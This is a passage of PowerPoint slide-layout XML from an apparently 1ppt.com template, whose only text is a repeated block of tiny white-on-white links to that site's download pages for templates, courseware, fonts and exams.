              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout207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07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07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07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0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08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08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08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08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08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08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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout208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08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08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08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0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09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09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09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09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09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09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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout209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09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09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09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1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10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10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10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10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10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10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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
